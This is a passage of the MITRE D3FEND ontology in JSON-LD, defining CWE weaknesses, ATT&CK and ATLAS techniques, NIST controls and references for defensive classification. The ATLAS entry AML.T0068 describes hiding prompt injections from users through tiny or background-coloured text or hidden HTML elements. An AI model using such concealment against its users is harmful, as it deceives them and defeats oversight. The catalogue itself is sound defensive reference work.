      "d3f:definition": "Creates a new file or directory, or opens an existing file, device, directory, or volume.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntcreatefile"
      },
      "rdfs:label": "Windows NtCreateFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:WebNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Web network traffic is network traffic that uses a standard web protocol.",
      "rdfs:label": "Web Network Traffic",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-607",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-607",
      "d3f:definition": "A public or protected static final field references a mutable object, which allows the object to be changed by malicious code, or accidentally from another package.",
      "rdfs:label": "Public Static Final Field References Mutable Object",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-471"
      }
    },
    {
      "@id": "d3f:RFShielding",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RFShielding"
      ],
      "d3f:d3fend-id": "D3-RFS",
      "d3f:definition": "Adding physical barriers to a platform to prevent undesired radio interference.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PrivacyAndSecuritySystemsAndMethodsOfUse"
        },
        {
          "@id": "d3f:Reference-Technical_Specifications_for_Construction_and_Management_of_Sensitive_Compartmented_Information_Facilities"
        }
      ],
      "rdfs:label": "RF Shielding",
      "rdfs:subClassOf": {
        "@id": "d3f:ElectromagneticRadiationHardening"
      }
    },
    {
      "@id": "d3f:Datalog",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DAT",
      "d3f:definition": "Datalog is a declarative logic programming language that is a syntactically a subset of Prolog.",
      "d3f:kb-article": "## How it works\nDatalog generally uses a bottom-up rather than top-down evaluation model. This difference yields significantly different behavior and properties from Prolog. It is often used as a query language for deductive databases. Datalog has been applied to problems in data integration, networking, program analysis, and more.\n\n## References\n1. Datalog. (2023, April 20). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Datalog)",
      "rdfs:label": "Datalog",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicProgramming"
      }
    },
    {
      "@id": "d3f:T1543.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1543.003",
      "d3f:definition": "Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.",
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabase"
      },
      "rdfs:label": "Windows Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1543"
        },
        {
          "@id": "_:N473e2b99d6234815a3d3de0cb3b6f836"
        }
      ]
    },
    {
      "@id": "_:N473e2b99d6234815a3d3de0cb3b6f836",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "d3f:T1070.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.001",
      "d3f:definition": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.",
      "d3f:modifies": {
        "@id": "d3f:EventLog"
      },
      "rdfs:label": "Clear Windows Event Logs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:N7f74cf5c30e448f290e21c11a6d65a58"
        }
      ]
    },
    {
      "@id": "_:N7f74cf5c30e448f290e21c11a6d65a58",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:OrchestrationController",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ContainerOrchestrationSoftware"
      },
      "d3f:definition": "An orchestration server provides orchestration services that automate the configuration, coordination, and management of computer systems and software.",
      "rdfs:label": "Orchestration Controller",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OrchestrationServer"
        },
        {
          "@id": "_:Nb0ea41c690e3490abeb5f0237ddd78c2"
        }
      ]
    },
    {
      "@id": "_:Nb0ea41c690e3490abeb5f0237ddd78c2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ContainerOrchestrationSoftware"
      }
    },
    {
      "@id": "d3f:OTSecurityCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Ensure confidentiality, integrity, or availability of system information.",
      "rdfs:label": "OT Security Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTNetworkManagementCommandEvent"
        },
        {
          "@id": "_:N73e48c1939f343988aff8597ba091b8a"
        }
      ]
    },
    {
      "@id": "_:N73e48c1939f343988aff8597ba091b8a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTSecurityCommand"
      }
    },
    {
      "@id": "d3f:NTFSJunctionPoint",
      "@type": "owl:Class",
      "d3f:definition": "NTFS junction points are are similar to NTFS symlinks but are defined only for directories. Only accepts local absolute paths.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:NTFS_links"
      },
      "rdfs:label": "NTFS Junction Point",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NTFSLink"
        },
        {
          "@id": "d3f:SymbolicLink"
        }
      ],
      "skos:altLabel": "Junction Point"
    },
    {
      "@id": "d3f:CWE-51",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-51",
      "d3f:definition": "The product accepts path input in the form of multiple internal slash ('/multiple//internal/slash/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '/multiple//internal/slash'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-41"
      }
    },
    {
      "@id": "d3f:CWE-1038",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1038",
      "d3f:definition": "The product uses a mechanism that automatically optimizes code, e.g. to improve a characteristic such as performance, but the optimizations can have an unintended side effect that might violate an intended security assumption.",
      "rdfs:label": "Insecure Automated Optimizations",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-435"
        },
        {
          "@id": "d3f:CWE-758"
        }
      ]
    },
    {
      "@id": "d3f:CWE-916",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-916",
      "d3f:definition": "The product generates a hash for a password, but it uses a scheme that does not provide a sufficient level of computational effort that would make password cracking attacks infeasible or expensive.",
      "rdfs:label": "Use of Password Hash With Insufficient Computational Effort",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-327"
        },
        {
          "@id": "d3f:CWE-328"
        }
      ]
    },
    {
      "@id": "d3f:Page",
      "@type": "owl:Class",
      "d3f:definition": "A page, memory page, logical page, or virtual page is a fixed-length contiguous block of virtual memory, described by a single entry in the page table. It is the smallest unit of data for memory management in a virtual memory operating system.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Page_(computer_memory)"
      },
      "rdfs:label": "Page",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:SPARTATactic",
      "@type": "owl:Class",
      "d3f:definition": "SPARTA Tactics represent the 'why' of a SPARTA technique. They denote the tactical goal of a threat actor and the reason for performing a technique.",
      "rdfs:label": "SPARTA Tactic",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/SPARTA"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAThing"
      }
    },
    {
      "@id": "d3f:T1552.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:PrivateKey"
      },
      "d3f:attack-id": "T1552.004",
      "d3f:definition": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.",
      "rdfs:label": "Private Keys",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1552"
        },
        {
          "@id": "_:N7f930fa1f9464df6ab15dc68a4fff9a5"
        }
      ]
    },
    {
      "@id": "_:N7f930fa1f9464df6ab15dc68a4fff9a5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrivateKey"
      }
    },
    {
      "@id": "d3f:FileServer",
      "@type": "owl:Class",
      "d3f:definition": "The term server highlights the role of the machine in the traditional client-server scheme, where the clients are the workstations using the storage. A file server does not normally perform computational tasks or run programs on behalf of its client workstations. File servers are commonly found in schools and offices, where users use a local area network to connect their client computers.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:File_server"
      },
      "rdfs:label": "File Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:CWE-822",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-822",
      "d3f:definition": "The product obtains a value from an untrusted source, converts this value to a pointer, and dereferences the resulting pointer.",
      "d3f:weakness-of": {
        "@id": "d3f:PointerDereferencingFunction"
      },
      "rdfs:label": "Untrusted Pointer Dereference",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:Nc4137d3cbccc49d8ad2bfafa88e96427"
        }
      ]
    },
    {
      "@id": "_:Nc4137d3cbccc49d8ad2bfafa88e96427",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PointerDereferencingFunction"
      }
    },
    {
      "@id": "d3f:CWE-392",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-392",
      "d3f:definition": "The product encounters an error but does not provide a status code or return value to indicate that an error has occurred.",
      "rdfs:label": "Missing Report of Error Condition",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-684"
        },
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:FileHeaderBlockSignature",
      "@type": "owl:Class",
      "d3f:definition": "A sequence of bytes used to identify and validate specific header sections within a file.",
      "rdfs:label": "File Header Block Signature",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:SoftwareClockEvent",
      "@type": "owl:Class",
      "d3f:definition": "A clock event involving a software-based timekeeping mechanism maintained by an operating system or application.",
      "rdfs:label": "Software Clock Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ClockEvent"
        },
        {
          "@id": "_:Nef70702914574ac0b58272a069c826de"
        }
      ]
    },
    {
      "@id": "_:Nef70702914574ac0b58272a069c826de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareClock"
      }
    },
    {
      "@id": "d3f:CWE-1087",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1087",
      "d3f:definition": "A class contains a virtual method, but the method does not have an associated virtual destructor.",
      "rdfs:label": "Class with Virtual Method without a Virtual Destructor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1076"
      }
    },
    {
      "@id": "d3f:carried-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x carried-by y: The information entity x is dependent upon the entity y for its storage, transport, or communication. Entity y serves as the necessary bearer or link from which x can be recovered or interpreted.",
      "owl:inverseOf": {
        "@id": "d3f:carries"
      },
      "rdfs:label": "carried-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-552",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-552",
      "d3f:definition": "The product makes files or directories accessible to unauthorized actors, even though they should not be.",
      "rdfs:label": "Files or Directories Accessible to External Parties",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-285"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:creates",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x creates y: The subject x brings into existence an object y. Some technique or agent x creates a persistent digital artifact y (as opposed to production of a consumable or transient object.); i.e., bring forth or generate.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01630392-v"
      },
      "rdfs:label": "creates",
      "rdfs:seeAlso": {
        "@id": "d3f:produces"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-create"
        }
      ]
    },
    {
      "@id": "d3f:TunnelOpenEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a network tunnel is established, enabling encapsulated communication between endpoints. This marks the initiation of secure or isolated data transport through the tunnel.",
      "rdfs:label": "Tunnel Open Event",
      "rdfs:subClassOf": {
        "@id": "d3f:TunnelEvent"
      }
    },
    {
      "@id": "d3f:DS0034",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Volume (ATT&CK DS)"
    },
    {
      "@id": "d3f:Reference-PointerValidationFunction_SEI",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://wiki.sei.cmu.edu/confluence/display/c/MEM10-C.+Define+and+use+a+pointer+validation+function"
      },
      "d3f:kb-organization": "Software Engineering Institute",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:NullPointerChecking"
        },
        {
          "@id": "d3f:PointerValidation"
        }
      ],
      "d3f:kb-reference-title": "SEI CERT C Coding Standard",
      "rdfs:label": "Reference - Pointer Validation Function - SEI"
    },
    {
      "@id": "d3f:CWE-1291",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1291",
      "d3f:definition": "The same public key is used for signing both debug and production code.",
      "rdfs:label": "Public Key Re-Use for Signing both Debug and Production Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Trusted Distribution",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PlatformHardening"
        }
      ],
      "rdfs:label": "SA-10(6)"
    },
    {
      "@id": "d3f:AML.T0068",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0068",
      "d3f:definition": "Adversaries may hide or otherwise obfuscate prompt injections or retrieval content from the user to avoid detection.\n\nThis may include modifying how the injection is rendered such as small text, text colored the same as the background, or hidden HTML elements.",
      "rdfs:label": "LLM Prompt Obfuscation - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0068"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDefenseEvasionTechnique"
      },
      "skos:prefLabel": "LLM Prompt Obfuscation"
    },
    {
      "@id": "d3f:NTPClientSyncEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP client requests and adjusts its clock based on time synchronization data provided by an NTP server, ensuring alignment with a standard time source.",
      "rdfs:label": "NTP Client Synchronization Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_30",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Filter Mechanisms Using Multiple Processes",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(30)"
    },
    {
      "@id": "d3f:CWE-125",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-125",
      "d3f:definition": "The product reads data past the end, or before the beginning, of the intended buffer.",
      "d3f:synonym": "OOB read",
      "d3f:weakness-of": {
        "@id": "d3f:RawMemoryAccessFunction"
      },
      "rdfs:label": "Out-of-bounds Read",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-119"
        },
        {
          "@id": "_:N8b47a9e36da44c4c871a954c5023e6e4"
        }
      ]
    },
    {
      "@id": "_:N8b47a9e36da44c4c871a954c5023e6e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RawMemoryAccessFunction"
      }
    },
    {
      "@id": "d3f:HardwareDeviceBindEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a device is logically bound to a system or process, typically for exclusive use or integration with specific software components.",
      "rdfs:label": "Hardware Device Bind Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDeviceStateEvent"
      }
    },
    {
      "@id": "d3f:T1222",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1222",
      "d3f:definition": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).",
      "d3f:modifies": {
        "@id": "d3f:AccessControlConfiguration"
      },
      "rdfs:label": "File and Directory Permissions Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "_:Ne2d3eef81e7c41b9ab0f519b47f98b3c"
        }
      ]
    },
    {
      "@id": "_:Ne2d3eef81e7c41b9ab0f519b47f98b3c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlConfiguration"
      }
    },
    {
      "@id": "d3f:T1048",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1048",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over Alternative Protocol",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N3eeb286b064b42e1913d94bb9add60a8"
        }
      ]
    },
    {
      "@id": "_:N3eeb286b064b42e1913d94bb9add60a8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-337",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-337",
      "d3f:definition": "A Pseudo-Random Number Generator (PRNG) is initialized from a predictable seed, such as the process ID or system time.",
      "rdfs:label": "Predictable Seed in Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-335"
      }
    },
    {
      "@id": "d3f:CWE-302",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-302",
      "d3f:definition": "The authentication scheme or implementation uses key data elements that are assumed to be immutable, but can be controlled or modified by the attacker.",
      "rdfs:label": "Authentication Bypass by Assumed-Immutable Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-807"
        }
      ]
    },
    {
      "@id": "d3f:File",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:FileSection"
      },
      "d3f:definition": "A file maintained in computer-readable form.",
      "d3f:may-contain": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "File",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/06521201-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Resource"
        },
        {
          "@id": "_:N18fbdad6c0e14c8a873f23f134c1dd04"
        },
        {
          "@id": "_:Nff27bae444cf40a782881b14cd6cf197"
        },
        {
          "@id": "_:N88f4dc3992374ed890d28ce8f6a3a8ca"
        }
      ]
    },
    {
      "@id": "_:N18fbdad6c0e14c8a873f23f134c1dd04",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSection"
      }
    },
    {
      "@id": "_:Nff27bae444cf40a782881b14cd6cf197",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N88f4dc3992374ed890d28ce8f6a3a8ca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:CWE-648",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-648",
      "d3f:definition": "The product does not conform to the API requirements for a function call that requires extra privileges. This could allow attackers to gain privileges by causing the function to be called incorrectly.",
      "rdfs:label": "Incorrect Use of Privileged APIs",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-269"
      }
    },
    {
      "@id": "d3f:Reference-InstantProcessTerminationToolToRecoverControlOfAnInformationHandlingSystem_DellProductsLP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20060236108A1/en"
      },
      "d3f:kb-abstract": "A method and system for automatic termination of unauthorized malevolent processes operating on an information handling system. A list of authenticated and essential process list is stored on the information handling system. Unauthorized processes not contained on the list can be automatically terminated by the user by invoking the present invention with a single click of a mouse or pointer device on an icon residing on the display screen of the information handling system. The offending processes are immediately terminated without generating a user prompt, which would ordinarily provide sufficient time for the malware to spawn additional offending processes. The present invention also provides significant means to recover control of a malware-infected information handling system in order to use repair tools and utilities. The present invention can be deployed at the time of manufacture of an information handling system or independently installed by a user.",
      "d3f:kb-author": "Carlton Andrews",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Dell Products LP",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:kb-reference-title": "Instant process termination tool to recover control of an information handling system",
      "rdfs:label": "Reference - Instant process termination tool to recover control of an information handling system - Dell Products LP"
    },
    {
      "@id": "d3f:CommandLineInterface",
      "@type": "owl:Class",
      "d3f:definition": "A command-line interface or command language interpreter (CLI), also known as command-line user interface, console user interface, and character user interface (CUI), is a means of interacting with a computer program where the user (or client) issues commands to the program in the form of successive lines of text (command lines). Command-line interfaces to computer operating systems are less widely used by casual computer users, who favor graphical user interfaces. Programs with command-line interfaces are generally easier to automate via scripting.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Command-line_interface"
      },
      "rdfs:label": "Command Line Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:UserInterface"
      },
      "skos:altLabel": [
        "CLI",
        "CUI",
        "Command-line Interface"
      ]
    },
    {
      "@id": "d3f:RDPConnectResponseEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an RDP server acknowledges a connection request, finalizing session parameters and confirming the transition to an interactive remote session.",
      "rdfs:label": "RDP Connect Response Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RDPEvent"
        },
        {
          "@id": "_:Nbaa684a73e5f4b3dbddc39ec471b8034"
        }
      ]
    },
    {
      "@id": "_:Nbaa684a73e5f4b3dbddc39ec471b8034",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RDPConnectRequestEvent"
      }
    },
    {
      "@id": "d3f:AML.T0063",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0063",
      "d3f:definition": "Adversaries may discover model outputs, such as class scores, whose presence is not required for the system to function and are not intended for use by the end user. Model outputs may be found in logs or may be included in API responses.\nModel outputs may enable the adversary to identify weaknesses in the model and develop attacks.",
      "rdfs:label": "Discover AI Model Outputs - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0063"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Discover AI Model Outputs"
    },
    {
      "@id": "d3f:ElectricalSignal",
      "@type": "owl:Class",
      "d3f:definition": "Time-varying voltage or current that carries information.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Signal"
      },
      "rdfs:label": "Electrical Signal",
      "rdfs:subClassOf": {
        "@id": "d3f:Signal"
      }
    },
    {
      "@id": "d3f:AML.T0055",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0055",
      "d3f:definition": "Adversaries may search compromised systems to find and obtain insecurely stored credentials.\nThese credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. bash history), environment variables, operating system, or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. private keys).",
      "rdfs:label": "Unsecured Credentials - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0055"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCredentialAccessTechnique"
      },
      "skos:prefLabel": "Unsecured Credentials"
    },
    {
      "@id": "d3f:ProcessEnvironmentVariable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An environment variable is a dynamic-named value that can affect the way running processes will behave on a computer. They are part of the environment in which a process runs.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Environment_variable"
      },
      "rdfs:label": "Process Environment Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "skos:altLabel": "Environment Variable"
    },
    {
      "@id": "d3f:CWE-1254",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1254",
      "d3f:definition": "The product's comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes.",
      "rdfs:label": "Incorrect Comparison Logic Granularity",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-208"
        },
        {
          "@id": "d3f:CWE-697"
        }
      ]
    },
    {
      "@id": "d3f:Reference-ServiceBinaryModifications_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-02-001/"
      },
      "d3f:kb-abstract": "Adversaries may modify the binary file for an existing service to achieve Persistence while potentially evading defenses. If a newly created or modified runs as a service, it may indicate APT activity. However, services are frequently installed by legitimate software. A well-tuned baseline is essential to differentiating between benign and malicious service modifications.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ServiceBinaryVerification"
      },
      "d3f:kb-reference-title": "CAR-2014-02-001: Service Binary Modifications",
      "rdfs:label": "Reference - CAR-2014-02-001: Service Binary Modifications - MITRE"
    },
    {
      "@id": "d3f:CWE-783",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-783",
      "d3f:definition": "The product uses an expression in which operator precedence causes incorrect logic to be used.",
      "rdfs:label": "Operator Precedence Logic Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-670"
      }
    },
    {
      "@id": "d3f:AML.T0016",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016",
      "d3f:definition": "Adversaries may search for and obtain software capabilities for use in their operations.\nCapabilities may be specific to AI-based attacks [Adversarial AI Attack Implementations](/techniques/AML.T0016.000) or generic software tools repurposed for malicious intent ([Software Tools](/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular AI-enabled system.",
      "rdfs:label": "Obtain Capabilities - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASResourceDevelopmentTechnique"
      },
      "skos:prefLabel": "Obtain Capabilities"
    },
    {
      "@id": "d3f:CCI-001169_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the download of organization-defined unacceptable mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
